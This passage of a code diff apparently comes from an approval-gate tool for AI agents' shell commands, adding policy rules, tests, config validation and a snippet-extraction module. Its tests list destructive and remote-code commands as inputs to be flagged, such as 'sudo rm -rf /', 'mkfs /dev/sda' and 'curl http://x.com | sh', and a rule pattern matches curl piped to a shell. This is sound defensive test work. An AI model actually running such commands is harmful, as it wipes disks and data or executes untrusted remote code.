snippet.split('\n').filter((l) => l.includes('line_')); + expect(windowLines[lineIndex]).toContain('line_15'); + expect(windowLines[lineIndex].startsWith('🛑')).toBe(true); + }); + + it('clamps window to the start of the text (hit near the top)', () => { + const text = makeLines(20); + const { snippet } = extractContext(text, 'line_2'); + // Window starts at line_1 (no lines before line_2 to show 3 above) + expect(snippet).toContain('line_1'); + expect(snippet).not.toContain('... 
[0 lines hidden]'); + }); + + it('clamps window to the end of the text (hit near the bottom)', () => { + const text = makeLines(20); + const { snippet } = extractContext(text, 'line_20'); + expect(snippet).toContain('line_20'); + }); + + it('prefers a non-comment line over a comment line with the same word', () => { + const lines = [ + '// rm -rf is dangerous', // comment hit + 'const x = 1;', + 'const y = 2;', + 'const z = 3;', + 'const a = 4;', + 'const b = 5;', + 'const c = 6;', + 'const d = 7;', + 'exec("rm -rf /tmp/old")', // non-comment hit — should be preferred + ]; + const text = lines.join('\n'); + const { snippet } = extractContext(text, 'rm'); + // The 🛑 line should contain the exec call, not the comment + const markedLine = snippet.split('\n').find((l) => l.startsWith('🛑')); + expect(markedLine).toBeDefined(); + expect(markedLine).toContain('exec'); + }); + + it('falls back to first hit if all occurrences are in comments', () => { + const lines = [ + '// rm is bad', + '// rm should be avoided', + 'const x = 1;', + 'const y = 2;', + 'const z = 3;', + 'const a = 4;', + 'const b = 5;', + 'const c = 6;', + 'const d = 7;', + ]; + const text = lines.join('\n'); + const { snippet } = extractContext(text, 'rm'); + const markedLine = snippet.split('\n').find((l) => l.startsWith('🛑')); + expect(markedLine).toBeDefined(); + // Falls back to the first hit (line 0 — the comment) + expect(markedLine).toContain('rm is bad'); + }); + + it('returns full text when word is not found in any line', () => { + const text = makeLines(20); + const { lineIndex } = extractContext(text, 'nonexistent_xyz'); + expect(lineIndex).toBe(-1); + }); + + it('adds head/tail markers when window is in the middle of a long text', () => { + const text = makeLines(30); + // Hit is in the middle — there will be hidden lines above and below + const { snippet } = extractContext(text, 'line_15'); + expect(snippet).toContain('lines hidden'); + }); +}); + +// ── computeRiskMetadata 
─────────────────────────────────────────────────────── + +describe('computeRiskMetadata', () => { + it('returns EXEC intent by default when no old_string/new_string', () => { + const meta = computeRiskMetadata({ command: 'sudo rm -rf /' }, 6, 'dangerous word: rm'); + expect(meta.intent).toBe('EXEC'); + }); + + it('returns EDIT intent when args has old_string and new_string', () => { + const meta = computeRiskMetadata( + { old_string: 'foo', new_string: 'bar', file_path: 'src/app.ts' }, + 5, + 'project rule' + ); + expect(meta.intent).toBe('EDIT'); + }); + + it('sets editFileName and editFilePath for EDIT intent', () => { + const meta = computeRiskMetadata( + { old_string: 'a', new_string: 'b', file_path: '/home/user/src/app.ts' }, + 5, + 'rule' + ); + expect(meta.editFilePath).toBe('/home/user/src/app.ts'); + expect(meta.editFileName).toBe('app.ts'); + }); + + it('includes tier and blockedByLabel in all cases', () => { + const meta = computeRiskMetadata({ command: 'drop' }, 6, 'dangerous: drop'); + expect(meta.tier).toBe(6); + expect(meta.blockedByLabel).toBe('dangerous: drop'); + }); + + it('includes matchedWord when provided', () => { + const meta = computeRiskMetadata({ command: 'mkfs /dev/sdb' }, 6, 'label', undefined, 'mkfs'); + expect(meta.matchedWord).toBe('mkfs'); + }); + + it('includes matchedField when provided', () => { + const meta = computeRiskMetadata({ command: 'x' }, 6, 'label', 'command'); + expect(meta.matchedField).toBe('command'); + }); + + it('includes ruleName when provided', () => { + const meta = computeRiskMetadata( + {}, + 2, + 'Smart Rule: block-force-push', + undefined, + undefined, + 'block-force-push' + ); + expect(meta.ruleName).toBe('block-force-push'); + }); + + it('extracts contextSnippet from matchedField for EXEC intent', () => { + const meta = computeRiskMetadata( + { command: 'sudo rm -rf /var' }, + 6, + 'label', + 'command', + 'sudo' + ); + expect(meta.contextSnippet).toBeDefined(); + 
expect(meta.contextSnippet).toContain('sudo'); + }); + + it('falls back to first code-like key when matchedField is absent', () => { + const meta = computeRiskMetadata({ command: 'ls -la' }, 6, 'label'); + // 'command' is in CODE_KEYS — should be picked up as the context source + expect(meta.contextSnippet).toBeDefined(); + expect(meta.contextSnippet).toContain('ls -la'); + }); + + it('handles Gemini-style stringified JSON args', () => { + const stringifiedArgs = JSON.stringify({ command: 'mkfs /dev/sdb' }); + const meta = computeRiskMetadata(stringifiedArgs, 6, 'label', 'command', 'mkfs'); + expect(meta.contextSnippet).toBeDefined(); + expect(meta.contextSnippet).toContain('mkfs'); + }); + + it('handles string args that are not JSON', () => { + const meta = computeRiskMetadata('plain string args', 6, 'label'); + expect(meta.contextSnippet).toBe('plain string args'); + }); + + it('omits optional fields when not provided', () => { + const meta = computeRiskMetadata({}, 3, 'inline exec'); + expect(meta.matchedWord).toBeUndefined(); + expect(meta.matchedField).toBeUndefined(); + expect(meta.ruleName).toBeUndefined(); + expect(meta.contextLineIndex).toBeUndefined(); + }); +}); diff --git a/src/__tests__/core.test.ts b/src/__tests__/core.test.ts index 36a4451..09443a7 100644 --- a/src/__tests__/core.test.ts +++ b/src/__tests__/core.test.ts @@ -135,8 +135,21 @@ describe('standard mode — safe tools', () => { }); // ── Standard mode — dangerous word detection ────────────────────────────────── +// DANGEROUS_WORDS is now intentionally minimal: only mkfs and shred. +// Everything else is handled by smart rules scoped to specific tool fields. 
describe('standard mode — dangerous word detection', () => { + it.each(['mkfs_ext4', 'run_mkfs', 'shred_file', 'shred_old_data'])( + 'evaluatePolicy flags "%s" as review (dangerous word match)', + async (tool) => { + expect((await evaluatePolicy(tool)).decision).toBe('review'); + } + ); + + it('dangerous word match is case-insensitive', async () => { + expect((await evaluatePolicy('MKFS_PARTITION')).decision).toBe('review'); + }); + it.each([ 'drop_table', 'truncate_logs', @@ -144,15 +157,12 @@ describe('standard mode — dangerous word detection', () => { 'format_drive', 'destroy_cluster', 'terminate_server', - 'revoke_access', 'docker_prune', - 'psql_execute', - ])('evaluatePolicy flags "%s" as review (dangerous word match)', async (tool) => { - expect((await evaluatePolicy(tool)).decision).toBe('review'); - }); - - it('dangerous word match is case-insensitive', async () => { - expect((await evaluatePolicy('DROP_DATABASE')).decision).toBe('review'); + ])('"%s" is now ALLOWED by default — was a false-positive source', async (tool) => { + // These words were removed from DANGEROUS_WORDS to prevent false positives + // (e.g. CSS drop-shadow, Vue destroy(), code formatters). + // Dangerous variants are now caught by scoped smart rules instead. 
+ expect((await evaluatePolicy(tool)).decision).toBe('allow'); }); }); @@ -168,45 +178,116 @@ describe('persistent decision approval', () => { } it('returns true when persistent decision is allow', async () => { - // Using 'drop' because it triggers a review, thus checking the decision file - setPersistentDecision('drop_db', 'allow'); - expect(await authorizeAction('drop_db', {})).toBe(true); + // Using 'mkfs_db' because 'mkfs' is in DANGEROUS_WORDS — triggers review, then checks decision file + setPersistentDecision('mkfs_db', 'allow'); + expect(await authorizeAction('mkfs_db', {})).toBe(true); }); it('returns false when persistent decision is deny', async () => { - setPersistentDecision('drop_db', 'deny'); - expect(await authorizeAction('drop_db', {})).toBe(false); + setPersistentDecision('mkfs_db', 'deny'); + expect(await authorizeAction('mkfs_db', {})).toBe(false); }); }); // ── Bash tool — shell command interception ──────────────────────────────────── describe('Bash tool — shell command interception', () => { + // ── Smart rule: block-force-push ────────────────────────────────────────── + it.each([ + { cmd: 'git push --force', desc: '--force flag' }, + { cmd: 'git push --force-with-lease', desc: '--force-with-lease' }, + { cmd: 'git push origin main -f', desc: '-f shorthand' }, + ])('block-force-push: blocks "$desc"', async ({ cmd }) => { + const result = await evaluatePolicy('Bash', { command: cmd }); + expect(result.decision).toBe('block'); + expect(result.ruleName).toBe('block-force-push'); + }); + + // ── Smart rule: review-git-push ─────────────────────────────────────────── + it.each([ + { cmd: 'git push origin main', desc: 'regular push to branch' }, + { cmd: 'git push', desc: 'bare push' }, + { cmd: 'git push --tags', desc: 'push tags' }, + ])('review-git-push: flags "$desc" as review', async ({ cmd }) => { + const result = await evaluatePolicy('Bash', { command: cmd }); + expect(result.decision).toBe('review'); + 
expect(result.ruleName).toBe('review-git-push'); + }); + + // ── Smart rule: review-git-destructive ──────────────────────────────────── it.each([ - { cmd: 'psql -c "drop table"', desc: 'database drop' }, - { cmd: 'docker rm -f my_db', desc: 'docker removal' }, - { cmd: 'purge /var/log', desc: 'purge command' }, - { cmd: 'format /dev/sdb', desc: 'format command' }, - { cmd: 'truncate -s 0 /db.log', desc: 'truncate' }, - ])('blocks Bash when command is "$desc"', async ({ cmd }) => { - expect((await evaluatePolicy('Bash', { command: cmd })).decision).toBe('review'); + { cmd: 'git reset --hard HEAD', desc: 'reset --hard' }, + { cmd: 'git clean -fd', desc: 'clean -fd' }, + { cmd: 'git clean -fdx', desc: 'clean -fdx' }, + { cmd: 'git rebase main', desc: 'rebase' }, + { cmd: 'git branch -D old-feat', desc: 'branch -D' }, + { cmd: 'git tag -d v1.0', desc: 'tag delete' }, + ])('review-git-destructive: flags "$desc" as review', async ({ cmd }) => { + const result = await evaluatePolicy('Bash', { command: cmd }); + expect(result.decision).toBe('review'); + expect(result.ruleName).toBe('review-git-destructive'); + }); + + // ── Smart rule: review-sudo ─────────────────────────────────────────────── + it.each([ + { cmd: 'sudo apt install vim', desc: 'sudo apt install' }, + { cmd: 'sudo rm -rf /var', desc: 'sudo rm' }, + { cmd: 'sudo systemctl restart nginx', desc: 'sudo systemctl' }, + ])('review-sudo: flags "$desc" as review', async ({ cmd }) => { + const result = await evaluatePolicy('Bash', { command: cmd }); + expect(result.decision).toBe('review'); + expect(result.ruleName).toBe('review-sudo'); + }); + + // ── Smart rule: review-curl-pipe-shell ──────────────────────────────────── + it.each([ + { cmd: 'curl http://x.com | sh', desc: 'curl | sh' }, + { cmd: 'curl http://x.com | bash', desc: 'curl | bash' }, + { cmd: 'wget http://x.com | sh', desc: 'wget | sh' }, + ])('review-curl-pipe-shell: blocks "$desc"', async ({ cmd }) => { + const result = await 
evaluatePolicy('Bash', { command: cmd }); + expect(result.decision).toBe('block'); + expect(result.ruleName).toBe('review-curl-pipe-shell'); }); + // ── Smart rule: review-drop-truncate-shell ──────────────────────────────── + it.each([ + { cmd: 'psql -c "DROP TABLE users"', desc: 'psql DROP TABLE' }, + { cmd: 'mysql -e "TRUNCATE TABLE logs"', desc: 'mysql TRUNCATE TABLE' }, + { cmd: 'psql -c "drop database prod"', desc: 'psql drop database (lowercase)' }, + ])('review-drop-truncate-shell: flags "$desc" as review', async ({ cmd }) => { + const result = await evaluatePolicy('Bash', { command: cmd }); + expect(result.decision).toBe('review'); + }); + + // ── Commands that are now allowed (removed from DANGEROUS_WORDS) ────────── + it.each([ + { cmd: 'docker ps', desc: 'docker ps' }, + { cmd: 'docker rm my_container', desc: 'docker rm (not -f /)' }, + { cmd: 'purge /var/log', desc: 'purge' }, + { cmd: 'format string', desc: 'format (not disk)' }, + { cmd: 'truncate -s 0 /db.log', desc: 'truncate file (not SQL TABLE)' }, + ])('allows Bash when command is "$desc" (not dangerous by default)', async ({ cmd }) => { + expect((await evaluatePolicy('Bash', { command: cmd })).decision).toBe('allow'); + }); + + // ── Existing allow cases ────────────────────────────────────────────────── it.each([ { cmd: 'rm -rf node_modules', desc: 'rm on node_modules (allowed by rule)' }, { cmd: 'ls -la', desc: 'ls' }, { cmd: 'cat /etc/hosts', desc: 'cat' }, { cmd: 'npm install', desc: 'npm install' }, - { cmd: 'delete old_file.txt', desc: 'delete (low friction allow)' }, + { cmd: 'git log --oneline', desc: 'git log' }, + { cmd: 'git status', desc: 'git status' }, + { cmd: 'git diff HEAD', desc: 'git diff' }, ])('allows Bash when command is "$desc"', async ({ cmd }) => { expect((await evaluatePolicy('Bash', { command: cmd })).decision).toBe('allow'); }); - it('authorizeHeadless blocks Bash drop when no approval mechanism', async () => { + it('authorizeHeadless blocks force push when no 
approval mechanism', async () => { mockNoNativeConfig(); - const result = await authorizeHeadless('Bash', { command: 'drop database production' }); + const result = await authorizeHeadless('Bash', { command: 'git push --force' }); expect(result.approved).toBe(false); - expect(result.noApprovalMechanism).toBe(true); }); }); @@ -330,7 +411,7 @@ describe('authorizeHeadless', () => { it('returns approved:false with noApprovalMechanism when no API key', async () => { mockNoNativeConfig(); - const result = await authorizeHeadless('drop_db', {}); + const result = await authorizeHeadless('mkfs_db', {}); expect(result.approved).toBe(false); expect(result.noApprovalMechanism).toBe(true); }); @@ -347,7 +428,7 @@ describe('authorizeHeadless', () => { json: async () => ({ approved: true, message: 'Approved via Slack' }), }) ); - const result = await authorizeHeadless('drop_db', { id: 1 }); + const result = await authorizeHeadless('mkfs_db', { id: 1 }); expect(result.approved).toBe(true); }); }); @@ -356,8 +437,8 @@ describe('authorizeHeadless', () => { describe('evaluatePolicy — project config', () => { it('returns "review" for dangerous tool', async () => { - // Changed 'delete_user' -> 'drop_user' to trigger the security review - expect((await evaluatePolicy('drop_user')).decision).toBe('review'); + // mkfs is in DANGEROUS_WORDS — tool names containing it are always reviewed + expect((await evaluatePolicy('mkfs_disk')).decision).toBe('review'); }); it('returns "allow" for safe tool in standard mode', async () => { @@ -380,47 +461,47 @@ describe('evaluatePolicy — project config', () => { describe('getPersistentDecision', () => { it('returns null when decisions file does not exist', () => { - expect(getPersistentDecision('drop_user')).toBeNull(); + expect(getPersistentDecision('mkfs_disk')).toBeNull(); }); it('returns "allow" when tool is set to always allow', () => { const decisionsPath = path.join('/mock/home', '.node9', 'decisions.json'); existsSpy.mockImplementation((p) => 
String(p) === decisionsPath); readSpy.mockImplementation((p) => - String(p) === decisionsPath ? JSON.stringify({ drop_user: 'allow' }) : '' + String(p) === decisionsPath ? JSON.stringify({ mkfs_disk: 'allow' }) : '' ); - expect(getPersistentDecision('drop_user')).toBe('allow'); + expect(getPersistentDecision('mkfs_disk')).toBe('allow'); }); it('returns "deny" when tool is set to always deny', () => { const decisionsPath = path.join('/mock/home', '.node9', 'decisions.json'); existsSpy.mockImplementation((p) => String(p) === decisionsPath); readSpy.mockImplementation((p) => - String(p) === decisionsPath ? JSON.stringify({ drop_user: 'deny' }) : '' + String(p) === decisionsPath ? JSON.stringify({ mkfs_disk: 'deny' }) : '' ); - expect(getPersistentDecision('drop_user')).toBe('deny'); + expect(getPersistentDecision('mkfs_disk')).toBe('deny'); }); it('returns null for an unrecognised value', () => { const decisionsPath = path.join('/mock/home', '.node9', 'decisions.json'); existsSpy.mockImplementation((p) => String(p) === decisionsPath); readSpy.mockImplementation((p) => - String(p) === decisionsPath ? JSON.stringify({ drop_user: 'maybe' }) : '' + String(p) === decisionsPath ? JSON.stringify({ mkfs_disk: 'maybe' }) : '' ); - expect(getPersistentDecision('drop_user')).toBeNull(); + expect(getPersistentDecision('mkfs_disk')).toBeNull(); }); }); describe('authorizeHeadless — persistent decisions', () => { + // Use 'mkfs_disk' — contains "mkfs" (still in DANGEROUS_WORDS) so it evaluates + // to "review" and authorizeHeadless will look up the persistent decision file. it('approves without API when persistent decision is "allow"', async () => { const decisionsPath = path.join('/mock/home', '.node9', 'decisions.json'); existsSpy.mockImplementation((p) => String(p) === decisionsPath); readSpy.mockImplementation((p) => - String(p) === decisionsPath ? JSON.stringify({ drop_user: 'allow' }) : '' + String(p) === decisionsPath ? 
JSON.stringify({ mkfs_disk: 'allow' }) : '' ); - // Use 'drop_user' so authorizeHeadless flags it as dangerous first, - // then proceeds to check the persistent decision file. - const result = await authorizeHeadless('drop_user', {}); + const result = await authorizeHeadless('mkfs_disk', {}); expect(result.approved).toBe(true); }); @@ -428,9 +509,9 @@ describe('authorizeHeadless — persistent decisions', () => { const decisionsPath = path.join('/mock/home', '.node9', 'decisions.json'); existsSpy.mockImplementation((p) => String(p) === decisionsPath); readSpy.mockImplementation((p) => - String(p) === decisionsPath ? JSON.stringify({ drop_user: 'deny' }) : '' + String(p) === decisionsPath ? JSON.stringify({ mkfs_disk: 'deny' }) : '' ); - const result = await authorizeHeadless('drop_user', {}); + const result = await authorizeHeadless('mkfs_disk', {}); expect(result.approved).toBe(false); expect(result.reason).toMatch(/always deny/i); }); @@ -626,24 +707,26 @@ describe('evaluatePolicy — smart rules', () => { }); it('custom smart rule verdict:block returns block decision', async () => { + // Use a pattern not covered by DEFAULT_CONFIG rules so we can assert the + // custom rule's reason without it being shadowed by a default rule. 
mockProjectConfig({ policy: { smartRules: [ { - name: 'no-curl-pipe', + name: 'no-deploy-script', tool: 'bash', conditions: [ - { field: 'command', op: 'matches', value: 'curl.+\\|.*(bash|sh)', flags: 'i' }, + { field: 'command', op: 'matches', value: 'deploy_production\\.sh', flags: 'i' }, ], verdict: 'block', - reason: 'curl piped to shell', + reason: 'production deploy script blocked by policy', }, ], }, }); - const result = await evaluatePolicy('bash', { command: 'curl http://x.com | bash' }); + const result = await evaluatePolicy('bash', { command: './deploy_production.sh --env prod' }); expect(result.decision).toBe('block'); - expect(result.reason).toMatch(/curl piped to shell/); + expect(result.reason).toMatch(/production deploy script blocked by policy/); }); it('custom smart rule verdict:allow short-circuits all further checks', async () => { diff --git a/src/__tests__/gemini_integration.test.ts b/src/__tests__/gemini_integration.test.ts index 6d79d29..d93b011 100644 --- a/src/__tests__/gemini_integration.test.ts +++ b/src/__tests__/gemini_integration.test.ts @@ -63,31 +63,31 @@ beforeEach(() => { describe('Gemini Integration Security', () => { it('identifies "Shell" (capital S) as a shell-executing tool', async () => { mockConfig({}); - // Use 'drop' which is a true "Nuke" in our new DANGEROUS_WORDS - const result = await evaluatePolicy('Shell', { command: 'psql -c "drop table users"' }); + // mkfs is in DANGEROUS_WORDS — proves Shell is inspected as a shell tool + const result = await evaluatePolicy('Shell', { command: 'mkfs.ext4 /dev/sdb' }); expect(result.decision).toBe('review'); }); it('identifies "run_shell_command" as a shell-executing tool', async () => { mockConfig({}); - // Use 'purge' which is in our new DANGEROUS_WORDS - const result = await evaluatePolicy('run_shell_command', { command: 'purge /var/log' }); + // mkfs is in DANGEROUS_WORDS — catches filesystem-wiping commands + const result = await evaluatePolicy('run_shell_command', { 
command: 'mkfs.ext4 /dev/sdb' }); expect(result.decision).toBe('review'); }); it('correctly parses complex shell commands inside run_shell_command', async () => { mockConfig({}); - // Proves the AST parser finds dangerous words even at the end of a chain + // Proves the AST parser finds the dangerous token even at the end of a chain const result = await evaluatePolicy('run_shell_command', { - command: 'ls -la && drop database', + command: 'ls -la && mkfs /dev/sdb', }); expect(result.decision).toBe('review'); }); it('blocks dangerous commands in Gemini hooks without API key', async () => { mockConfig({}); - // 'docker' is in our new DANGEROUS_WORDS - const result = await authorizeHeadless('Shell', { command: 'docker rm -f my_container' }); + // mkfs triggers dangerous-word review; no native/cloud approver → noApprovalMechanism + const result = await authorizeHeadless('Shell', { command: 'mkfs /dev/sda' }); expect(result.approved).toBe(false); expect(result.noApprovalMechanism).toBe(true); }); diff --git a/src/__tests__/protect.test.ts b/src/__tests__/protect.test.ts index e9d3f3b..5c9afc6 100644 --- a/src/__tests__/protect.test.ts +++ b/src/__tests__/protect.test.ts @@ -47,11 +47,12 @@ describe('protect()', () => { }); it('throws and does NOT call the wrapped function when denied', async () => { - // Changed 'delete_resource' -> 'drop_resource' - setPersistentDecision('drop_resource', 'deny'); + // 'mkfs_resource' contains 'mkfs' (in DANGEROUS_WORDS) so it evaluates to review, + // then the persistent deny decision kicks in. 
+ setPersistentDecision('mkfs_resource', 'deny'); const fn = vi.fn(); - const secured = protect('drop_resource', fn); + const secured = protect('mkfs_resource', fn); await expect(secured()).rejects.toThrow(/denied/i); expect(fn).not.toHaveBeenCalled(); diff --git a/src/cli.ts b/src/cli.ts index 4d5948f..5cb3f32 100644 --- a/src/cli.ts +++ b/src/cli.ts @@ -333,7 +333,13 @@ program cloud: true, terminal: true, }; - approvers.cloud = !options.local; + // Only change cloud setting when --local is explicitly passed. + // Without --local, preserve whatever the user had before so that + // re-running `node9 login` to refresh an API key doesn't silently + // re-enable cloud approvals for users who had turned them off. + if (options.local) { + approvers.cloud = false; + } s.approvers = approvers; if (!fs.existsSync(path.dirname(configPath))) fs.mkdirSync(path.dirname(configPath), { recursive: true }); diff --git a/src/config-schema.ts b/src/config-schema.ts new file mode 100644 index 0000000..e2cef10 --- /dev/null +++ b/src/config-schema.ts @@ -0,0 +1,165 @@ +// src/config-schema.ts +// Zod schemas for node9 config.json validation. +// Validates each config layer before it is merged into the running config, +// so bad user configs produce a clear error instead of silently using defaults. + +import { z } from 'zod'; + +// ── Helpers ────────────────────────────────────────────────────────────────── + +/** Rejects strings that contain literal newline characters (breaks JSON). */ +const noNewlines = z.string().refine((s) => !s.includes('\n') && !s.includes('\r'), { + message: 'Value must not contain literal newline characters (use \\n instead)', +}); + +/** Validates that a string is a valid regex pattern. 
*/ +const validRegex = noNewlines.refine( + (s) => { + try { + new RegExp(s); + return true; + } catch { + return false; + } + }, + { message: 'Value must be a valid regular expression' } +); + +// ── Smart Rules ─────────────────────────────────────────────────────────────── + +const SmartConditionSchema = z.object({ + field: z.string().min(1, 'Condition field must not be empty'), + op: z.enum(['matches', 'notMatches', 'contains', 'notContains', 'exists', 'notExists'], { + errorMap: () => ({ + message: 'op must be one of: matches, notMatches, contains, notContains, exists, notExists', + }), + }), + value: validRegex.optional(), + flags: z.string().optional(), +}); + +const SmartRuleSchema = z.object({ + name: z.string().optional(), + tool: z.string().min(1, 'Smart rule tool must not be empty'), + conditions: z.array(SmartConditionSchema).min(1, 'Smart rule must have at least one condition'), + conditionMode: z.enum(['all', 'any']).optional(), + verdict: z.enum(['allow', 'review', 'block'], { + errorMap: () => ({ message: 'verdict must be one of: allow, review, block' }), + }), + reason: z.string().optional(), +}); + +// ── Policy Rules ────────────────────────────────────────────────────────────── + +const PolicyRuleSchema = z.object({ + action: z.string().min(1), + allowPaths: z.array(z.string()).optional(), + blockPaths: z.array(z.string()).optional(), +}); + +// ── Top-level Config ───────────────────────────────────────────────────────── + +export const ConfigFileSchema = z + .object({ + version: z.string().optional(), + settings: z + .object({ + mode: z.enum(['standard', 'strict', 'audit']).optional(), + autoStartDaemon: z.boolean().optional(), + enableUndo: z.boolean().optional(), + enableHookLogDebug: z.boolean().optional(), + approvalTimeoutMs: z.number().nonnegative().optional(), + approvers: z + .object({ + native: z.boolean().optional(), + browser: z.boolean().optional(), + cloud: z.boolean().optional(), + terminal: z.boolean().optional(), + }) + 
.optional(), + environment: z.string().optional(), + slackEnabled: z.boolean().optional(), + enableTrustSessions: z.boolean().optional(), + allowGlobalPause: z.boolean().optional(), + }) + .optional(), + policy: z + .object({ + sandboxPaths: z.array(z.string()).optional(), + dangerousWords: z.array(noNewlines).optional(), + ignoredTools: z.array(z.string()).optional(), + toolInspection: z.record(z.string()).optional(), + rules: z.array(PolicyRuleSchema).optional(), + smartRules: z.array(SmartRuleSchema).optional(), + snapshot: z + .object({ + tools: z.array(z.string()).optional(), + onlyPaths: z.array(z.string()).optional(), + ignorePaths: z.array(z.string()).optional(), + }) + .optional(), + }) + .optional(), + environments: z.record(z.object({ requireApproval: z.boolean().optional() })).optional(), + }) + .strict({ message: 'Config contains unknown top-level keys' }); + +export type ConfigFileInput = z.input<typeof ConfigFileSchema>; + +/** + * Validates a parsed config object. Returns a formatted error string on failure, + * or null if valid. + */ +export function validateConfig(raw: unknown, filePath: string): string | null { + const result = ConfigFileSchema.safeParse(raw); + if (result.success) return null; + + const lines = result.error.issues.map((issue) => { + const path = issue.path.length > 0 ? issue.path.join('.') : 'root'; + return ` • ${path}: ${issue.message}`; + }); + + return `Invalid config at ${filePath}:\n${lines.join('\n')}`; +} + +/** + * Like validateConfig, but also returns a sanitized copy of the config with + * invalid fields removed. Top-level fields that fail validation are dropped so + * they cannot override valid values from a higher-priority config layer.
+ */ +export function sanitizeConfig(raw: unknown): { + sanitized: Record<string, unknown>; + error: string | null; +} { + const result = ConfigFileSchema.safeParse(raw); + if (result.success) { + return { sanitized: result.data as Record<string, unknown>, error: null }; + } + + // Build the set of top-level keys that have at least one validation error + const invalidTopLevelKeys = new Set( + result.error.issues + .filter((issue) => issue.path.length > 0) + .map((issue) => String(issue.path[0])) + ); + + // Keep only the top-level keys that had no errors + const sanitized: Record<string, unknown> = {}; + if (typeof raw === 'object' && raw !== null) { + for (const [key, value] of Object.entries(raw as Record<string, unknown>)) { + if (!invalidTopLevelKeys.has(key)) { + sanitized[key] = value; + } + } + } + + const lines = result.error.issues.map((issue) => { + const path = issue.path.length > 0 ? issue.path.join('.') : 'root'; + return ` • ${path}: ${issue.message}`; + }); + + return { + sanitized, + error: `Invalid config:\n${lines.join('\n')}`, + }; +} diff --git a/src/context-sniper.ts b/src/context-sniper.ts new file mode 100644 index 0000000..bb2a1c0 --- /dev/null +++ b/src/context-sniper.ts @@ -0,0 +1,161 @@ +// src/context-sniper.ts +// Shared Context Sniper module. +// Pre-computes the code snippet and intent ONCE in authorizeHeadless (core.ts), +// then the resulting RiskMetadata bundle flows to every approval channel: +// native popup, browser daemon, cloud/SaaS backend, Slack, and Mission Control.
+ +import path from 'path'; + +export interface RiskMetadata { + intent: 'EDIT' | 'EXEC'; + tier: 1 | 2 | 3 | 4 | 5 | 6 | 7; + blockedByLabel: string; + matchedWord?: string; + matchedField?: string; + contextSnippet?: string; // Pre-computed 7-line window with 🛑 marker + contextLineIndex?: number; // Index of the 🛑 line within the snippet (0-based) + editFileName?: string; // basename of file_path (EDIT intent only) + editFilePath?: string; // full file_path (EDIT intent only) + ruleName?: string; // Tier 2 (Smart Rules) only +} + +/** Keeps the start and end of a long string, truncating the middle. */ +export function smartTruncate(str: string, maxLen = 500): string { + if (str.length <= maxLen) return str; + const edge = Math.floor(maxLen / 2) - 3; + return `${str.slice(0, edge)} ... ${str.slice(-edge)}`; +} + +/** + * Returns the 7-line context window centred on matchedWord, plus the + * 0-based index of the hit line within the returned snippet. + * If the text is short or the word isn't found, returns the full text and lineIndex -1. + */ +export function extractContext( + text: string, + matchedWord?: string +): { snippet: string; lineIndex: number } { + const lines = text.split('\n'); + if (lines.length <= 7 || !matchedWord) { + return { snippet: smartTruncate(text, 500), lineIndex: -1 }; + } + + const escaped = matchedWord.replace(/[.*+?^${}()|[\]\\]/g, '\\$&'); + const pattern = new RegExp(`\\b${escaped}\\b`, 'i'); + + const allHits = lines.map((line, i) => ({ i, line })).filter(({ line }) => pattern.test(line)); + if (allHits.length === 0) return { snippet: smartTruncate(text, 500), lineIndex: -1 }; + + // Prefer non-comment lines so we highlight actual code, not documentation + const nonComment = allHits.find(({ line }) => { + const trimmed = line.trim(); + return !trimmed.startsWith('//') && !trimmed.startsWith('#'); + }); + const hitIndex = (nonComment ?? 
allHits[0]).i; + + const start = Math.max(0, hitIndex - 3); + const end = Math.min(lines.length, hitIndex + 4); + const lineIndex = hitIndex - start; + + const snippet = lines + .slice(start, end) + .map((line, i) => `${start + i === hitIndex ? '🛑 ' : ' '}${line}`) + .join('\n'); + + const head = start > 0 ? `... [${start} lines hidden] ...\n` : ''; + const tail = end < lines.length ? `\n... [${lines.length - end} lines hidden] ...` : ''; + + return { snippet: `${head}${snippet}${tail}`, lineIndex }; +} + +const CODE_KEYS = [ + 'command', + 'cmd', + 'shell_command', + 'bash_command', + 'script', + 'code', + 'input', + 'sql', + 'query', + 'arguments', + 'args', + 'param', + 'params', + 'text', +]; + +/** + * Computes the RiskMetadata bundle from args + policy result fields. + * Called once in authorizeHeadless; the result is forwarded unchanged to all channels. + */ +export function computeRiskMetadata( + args: unknown, + tier: RiskMetadata['tier'], + blockedByLabel: string, + matchedField?: string, + matchedWord?: string, + ruleName?: string +): RiskMetadata { + let intent: 'EDIT' | 'EXEC' = 'EXEC'; + let contextSnippet: string | undefined; + let contextLineIndex: number | undefined; + let editFileName: string | undefined; + let editFilePath: string | undefined; + + // Handle Gemini-style stringified JSON + let parsed = args; + if (typeof args === 'string') { + const trimmed = args.trim(); + if (trimmed.startsWith('{') && trimmed.endsWith('}')) { + try { + parsed = JSON.parse(trimmed); + } catch { + /* keep as string */ + } + } + } + + if (parsed && typeof parsed === 'object' && !Array.isArray(parsed)) { + const obj = parsed as Record<string, unknown>; + + if (obj.old_string !== undefined && obj.new_string !== undefined) { + // EDIT intent — extract context from the incoming new_string + intent = 'EDIT'; + if (obj.file_path) { + editFilePath = String(obj.file_path); + editFileName = path.basename(editFilePath); + } + const result = extractContext(String(obj.new_string),
matchedWord); + contextSnippet = result.snippet; + if (result.lineIndex >= 0) contextLineIndex = result.lineIndex; + } else if (matchedField && obj[matchedField] !== undefined) { + // EXEC — we know which field triggered, extract context from it + const result = extractContext(String(obj[matchedField]), matchedWord); + contextSnippet = result.snippet; + if (result.lineIndex >= 0) contextLineIndex = result.lineIndex; + } else { + // EXEC fallback — pick the first recognisable code-like key + const foundKey = Object.keys(obj).find((k) => CODE_KEYS.includes(k.toLowerCase())); + if (foundKey) { + const val = obj[foundKey]; + contextSnippet = smartTruncate(typeof val === 'string' ? val : JSON.stringify(val), 500); + } + } + } else if (typeof parsed === 'string') { + contextSnippet = smartTruncate(parsed, 500); + } + + return { + intent, + tier, + blockedByLabel, + ...(matchedWord && { matchedWord }), + ...(matchedField && { matchedField }), + ...(contextSnippet !== undefined && { contextSnippet }), + ...(contextLineIndex !== undefined && { contextLineIndex }), + ...(editFileName && { editFileName }), + ...(editFilePath && { editFilePath }), + ...(ruleName && { ruleName }), + }; +} diff --git a/src/core.ts b/src/core.ts index 89dff7e..517ad77 100644 --- a/src/core.ts +++ b/src/core.ts @@ -7,6 +7,8 @@ import os from 'os'; import pm from 'picomatch'; import { parse } from 'sh-syntax'; import { askNativePopup, sendDesktopNotification } from './ui/native'; +import { computeRiskMetadata, RiskMetadata } from './context-sniper'; +import { sanitizeConfig } from './config-schema'; // ── Feature file paths ──────────────────────────────────────────────────────── const PAUSED_FILE = path.join(os.homedir(), '.node9', 'PAUSED'); @@ -460,16 +462,12 @@ export 